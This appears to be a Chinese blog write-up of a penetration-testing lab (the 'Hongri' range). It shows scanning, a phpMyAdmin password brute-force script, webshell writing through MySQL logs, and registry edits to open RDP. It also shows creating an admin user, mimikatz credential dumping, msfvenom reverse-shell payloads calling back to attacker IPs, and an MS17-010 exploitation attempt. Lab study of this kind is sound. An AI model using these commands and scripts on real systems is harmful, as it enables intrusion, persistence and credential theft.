【Penetration】红日靶场(一)

nmap探查存活主机
nmap -sP 10.10.2.0/24
图片: https://uploader.shimo.im/f/cfuQ653BEvyA42FR.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

nmap探查目标主机服务
nmap -sV 10.10.2.145
图片: https://uploader.shimo.im/f/NAPgMmL8pPSn4aqp.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

很多不认识的服务,只能一个个去百度了

对msrpc服务进行探测
msrpc MS Remote Procedure Control
直接谷歌,看看有没有可以利用的

发现一个MS08-067漏洞---MSRPC over SMB,测试了暴露出来的所有端口,并无结果

对MySQL服务进行探测
对服务进行进一步探测
use auxiliary/scanner/mysql/mysql_version
服务确实存在,本想着直接使用 mysql_sql直接连接,然后执行,但似乎没用,猜测是不是只允许内网访问

尝试使用mysql_login模块进行密码爆破
搞了好久,发现有些模块在测试的时候,把ip地址输入错误了,只能重来

百度了,说unauthorized就是不允许访问的意思,估计就是只限内网访问把
对ssl/ms-wbt-server
貌似不好利用,等下再来

对http服务进行探测
网站信息收集

网站的绝对路径是 C:/phpStudy/WWW
数据库采用的是 mysql
php 版本5.4.45

图片: https://uploader.shimo.im/f/dVfiMM4AaXqJGezF.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

直接访问,是一个phpStudy探针,应该就是和phpinfo差不多的东西把
10.10.2.145/l.php
看看探针,为什么下面测试的密码是对的???
图片: https://uploader.shimo.im/f/DPmRk4aSwrrSluBA.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8
抓包发现密码是root/root.就是不知道是真的,还是仅仅是探测密码!!!所以开发人员要注意,避免密码泄露

似乎没什么了,先扫描一下目录把
网站返回403,还是需要关注下,这只是说明没有权限访问,但是还是可能存在的

DirBurst直接扫描目录,发现了phpmyadmin,而且密码好像就是root/root,不知道是不是有缓存的原因,,将密码改动了下,再次进行仿真探测
还扫描到了之前上传的 木马,哈哈哈哈,事实证明信息收集很重要

这里还有另外一条路子,就是其实还有一个cms站,里面也有东西,可以直接修改模板,最后叶形成webshell

对phpmyadmin进行密码爆破,但结果发现都是302转发,那怎么判断密码是否正确呢?好像可以设置跟着跳转,又学会了一个新技巧

对phpmyadmin爆破时有个关键点,就是每次访问都会换一个token,所以直接用bp似乎是没法爆破的,除非能自动匹配token并将token放在请求头
图片: https://uploader.shimo.im/f/jKDkmUs8iAAGhLC0.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

直接在网上巴拉了个脚本
from requests import session
from re import findall
from html import unescape

phpmyadmin地址,例如 http://localhost/index.php

target = 'http://localhost/index.php'

要爆破的用户名

user = 'root'

密码字典文件路径

passdic = 'password.txt'

ss = session()
ss.headers = {'Accept': '/', 'Accept-Encoding': 'gzip, deflate',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/87.0.4280.88 Safari/537.36'}

def get_token(text) -> str:
# 获取token
token = findall("name="token" value="(.*?)" />", text)
return unescape(token[0]) if token else None

def get_title(text) -> str:
# 获取标题
title = findall('(.*)', text)
return title[0] if title else None

def try_login(user, pwd, token):
# 尝试登陆
data = {'pma_username': user,
'pma_password': pwd,
'server': 1,
'target': 'index.php',
'token': token}
r = ss.post(url=target, data=data)
return r.text

def burst_pma():
# 爆破
with open(passdic, 'r', encoding='utf-8') as f:
html = try_login('', '', '')
title_fail = get_title(html)
token = get_token(html)
for line in f:
pwd = line.strip()
print(f'[?] loading... {user} {pwd} ')
html = try_login(user, pwd, token)
title = get_title(html)
token = get_token(html)
if title != title_fail:
print(f'[√] success {title}')
with open('success.txt', 'a', encoding='utf-8') as f:
f.write(f'{target} | {user} | {pwd}\n')
break
else:
print(f'[×] failed {title}')

try:
    if __name__ == "__main__":
        burst_pma()
except Exception as e:
    print(e)

最后爆破出了密码 123456

拿到phpmyadmin ,直接尝试写入webshell,参考webshell需要什么??
直接写webshell到刚开始的网站目录下 C:/phpStudy/WWW
发现开启了secure_file_priv ,无法对文件直接写入,尝试log写入,log包括正常log,慢日志,错误日志
成功写入webshell,mima pJack直接连antsword,但似乎连不上,可能有各种原因把,这个时候就尝试用各种webshell工具连接,最终用开山符连接上了

进入内网渗透环节
开山斧似乎无法打开shell,尝试用msfvenmon生成反弹shell,然后上传到靶机,并执行,但好像也要执行命令行执行才行。
换了菜刀,这下文件,shell终于都可以操作了
先用命令行开启3389,可以避免被杀毒软件发现
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /F

reg add    "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fDenyTSConnections /t REG_DWORD /d 0

成功 添加一个用户,并将其添加至本地管理员组和远程桌面组,用于远程桌面访问
net user aur0ra 123.com
net localgroup "Remote Desktop Users" aur0ra /add
net localgroup Administrator aur0ra /add

远程桌面访问会挤出另外一个用户,极有可能被发现,怎么处理?
暂时先直接在靶机上开启,但应该有命令行操作组策略的方法
内网渗透
信息收集
操作见另外一章
1.获取DC
2.通过本地用户,来猜测是否是域用户
3.密码提取工具获取密码,并将密码作为一个字典,用于爆破其他用户
使用mimikatz,抓取密码,但貌似失败了,原因是没有以管理员身份打开
使用mimikatz抓取密码:提权,抓取
aur0ra/123.com
Administrator/123.com
猜测该用户会不会就是域管理员
好家伙,真就是域管理员,那后面不久随意飘了
收集到的信息
域为 god.org
DC---192.168.52.128
获取域用户
Administrator/123.com
通过bat脚本获取系统架构信息

到此已经拿下一台主机

接着以该主机为跳板,递归搜索其他信息
为了集中管理,将所有的会话交给msf

先用msfvenom生成exp,windows优先生成ps脚本,不容易被查杀
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.2.149 LROST=6666 -f psh-reflection > /tmp/evil.ps1
再通过菜刀将文件上传,msf开启监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
...
由于是接着渗透,所以不知道为什么出现3389连接不上,原来是添加的用户仅仅是本地用户,但登录的时候用的是域用户登录的
但还是不能解决单点登录的问题,在这里直接在靶机上,或者通过rdektop临时操作,但实际情况下,会把对方挤下线,从而被发现,所以这中方式肯定是不行的用工具后面自己解决
先学用命令行操作注册表、组策略
再打开3389多点登录的问题
图片: https://uploader.shimo.im/f/jJTDrG7ocXsTyM1P.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8
直接在powershell中执行脚本,发现失败,应该是策略禁止powershell执行
对powershell不同的限制策略
https://blog.csdn.net/Jeffxu_lib/article/details/84710386

修改组策略
Get-ExecutionPolicy 查看ps策略
Get-ExecutionPolicy -List 查看所有的策略
Set-ExecutionPolicy unrestricted修改策略为松
修改失败,发现只能用管理员

不管怎么样都反弹失败,换个exe试试?

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.2.141 LPORT=9999 -f exe -o 123.exe

msfvenom 自动生成木马

还是一样,上传,执行
成功反弹shell
图片: https://uploader.shimo.im/f/wxvnmd9x3EyXlKbf.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

又到了提权阶段
kali中运行Windows-Exploit-Suggester工具
use post/multi/recon/local_exploit_suggester
图片: https://uploader.shimo.im/f/aAtdJ4FtbbxrRyQf.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

不知道为什么提权都失败了

用 background 将会话挂起,想用再用 sessions -i 进行交互就行,还可以使用shell进入靶机命令行

横向咯

先对内网进行扫描,很多东西,这里利用msf自带的扫描模块auxiliary/scanner/netbios/nbname
尽量用一些比较底层的协议进行探测,不容易被发现
使用自带的ping探测
for /L %I in (1,1,254) DO @ping -w 1 -n 1 10.10.2.%I | findstr 0%

这里有点问题,就是findstr的用法。加了双引号和不加的区别

search scanner看msf中的探测模块类型

下面主要常用的扫描模块

auxiliary/scanner/netbios/nbname #探测内网主机的netbios名字
auxiliary/scanner/discovery/arp_sweep #基于arp协议发现内网存活主机,这不能通过代理使用
auxiliary/scanner/portscan/ack #基于tcp的ack回复进行端口扫描,默认扫描1-10000端口
auxiliary/scanner/portscan/tcp #基于tcp进行端口扫描,默认扫描1-10000端口
auxiliary/scanner/discovery/udp_sweep #基于udp协议发现内网存活主机
auxiliary/scanner/discovery/udp_probe #基于udp协议发现内网存活主机
auxiliary/scanner/netbios/nbname #基于netbios协议发现内网存活主机
auxiliary/scanner/ftp/ftp_version #发现内网ftp服务,基于默认21端口
auxiliary/scanner/ssh/ssh_version #发现内网ssh服务,基于默认22端口
auxiliary/scanner/telnet/telnet_version #发现内网telnet服务,基于默认23端口
auxiliary/scanner/dns/dns_amp #发现dns服务,基于默认53端口
auxiliary/scanner/http/http_version #发现内网http服务,基于默认80端口
auxiliary/scanner/http/title #探测内网http服务的标题
auxiliary/scanner/smb/smb_version #发现内网smb服务,基于默认的445端口
use auxiliary/scanner/mssql/mssql_schemadump #发现内网SQLServer服务,基于默认的1433端口
use auxiliary/scanner/oracle/oracle_hashdump #发现内网oracle服务,基于默认的1521端口
auxiliary/scanner/mysql/mysql_version #发现内网mysql服务,基于默认3306端口
auxiliary/scanner/rdp/rdp_scanner #发现内网RDP服务,基于默认3389端口
auxiliary/scanner/redis/redis_server #发现内网Redis服务,基于默认6379端口
auxiliary/scanner/db2/db2_version #探测内网的db2服务,基于默认的50000端口
auxiliary/scanner/discovery/arp_sweep

图片: https://uploader.shimo.im/f/lgt9NUQ1cyGmRJip.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

所以内网主机还有 192.168.52.128|141

对端口服务进行扫描
use auxiliary/scanner/portscan/tcp
对80 445 3389 端口进行扫描

图片: https://uploader.shimo.im/f/0ZEVIYJn4vWzCu2b.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

看看是否存在 ms17-010永恒之蓝漏洞
图片: https://uploader.shimo.im/f/kfodN5tVNiXptPyE.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

还真有

直接使用ms17-010-command执行命令
auxiliary/admin/smb/ms17_010_command
图片: https://uploader.shimo.im/f/VmSQdsD2Rybxcuy5.png!thumbnail?accessToken=eyJhbGciOiJIUzI1NiIsImtpZCI6ImRlZmF1bHQiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJhY2Nlc3NfcmVzb3VyY2UiLCJleHAiOjE2MzUyNTIxODYsImciOiJ5OEpYSFJ0ZDZ5a1lyR2prIiwiaWF0IjoxNjM1MjUxODg2LCJ1c2VySWQiOjY5NDQ5MzgzfQ.nTdCWCFelxGW4QkiZg_ZZ2gKsN2kA6FGCqNgkT5MQN8

怎么发现又反弹失败呢(以后还是一鼓作气搞完把),exe也没用了,看看还有什么其他的

害,不管了,反正后面就是关于cs和msf联动的东西了,道理都是一样的

posted @ 2021-10-26 20:43  Aur0ra*  阅读(401)  评论(0编辑  收藏  举报